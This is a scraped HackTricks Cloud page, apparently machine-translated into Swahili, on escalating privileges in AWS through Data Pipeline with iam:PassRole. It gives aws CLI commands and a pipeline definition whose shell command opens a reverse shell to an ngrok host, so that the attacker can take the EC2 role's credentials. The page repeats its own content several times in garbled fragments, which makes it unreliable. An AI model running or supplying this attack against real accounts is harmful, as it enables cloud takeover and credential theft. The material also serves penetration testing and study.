AWS - Datapipeline Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

datapipeline

Kwa maelezo zaidi kuhusu datapipeline angalia:

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Watumiaji wenye idhini hizi wanaweza kuongeza mamlaka kwa kuunda Data Pipeline ili kutekeleza amri zisizo na mipaka kwa kutumia idhini za jukumu lililotolewa:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Baada ya kuunda pipeline, mshambuliaji anasasisha ufafanuzi wake ili kuamuru vitendo maalum au uundaji wa rasilimali:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Kumbuka kwamba role katika line 14, 15 na 27 inahitaji kuwa role inayoweza kuchukuliwa na datapipeline.amazonaws.com na role katika line 28 inahitaji kuwa role inayoweza kuchukuliwa na ec2.amazonaws.com yenye profaili ya EC2 instance.

Zaidi ya hayo, instance ya EC2 itakuwa na ufikiaji tu kwa role inayoweza kuchukuliwa na instance ya EC2 (hivyo unaweza kuiba hiyo pekee).

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

The faili la ufafanuzi wa pipeline, lililotengenezwa na mshambuliaji, linaelekezo ya kutekeleza amri au kuunda rasilimali kupitia API ya AWS, ikitumia ruhusa za jukumu la Data Pipeline ili kupata haki za ziada.

Athari Zinazoweza Kutokea: Privesc ya moja kwa moja kwa jukumu la huduma ya ec2 lililotajwa.

Marejeleo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cognito Privesc NextAWS - Directory Services Privesc

Last updated 8 days ago

datapipeline

Kwa maelezo zaidi kuhusu datapipeline angalia:

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Watumiaji wenye idhini hizi wanaweza kuongeza mamlaka kwa kuunda Data Pipeline ili kutekeleza amri zisizo na mipaka kwa kutumia idhini za jukumu lililotolewa:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Baada ya kuunda pipeline, mshambuliaji anasasisha ufafanuzi wake ili kuamuru vitendo maalum au uundaji wa rasilimali:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Zaidi ya hayo, instance ya EC2 itakuwa na ufikiaji tu kwa role inayoweza kuchukuliwa na instance ya EC2 (hivyo unaweza kuiba hiyo pekee).

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

Athari Zinazoweza Kutokea: Privesc ya moja kwa moja kwa jukumu la huduma ya ec2 lililotajwa.

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Marejeleo

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Marejeleo

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`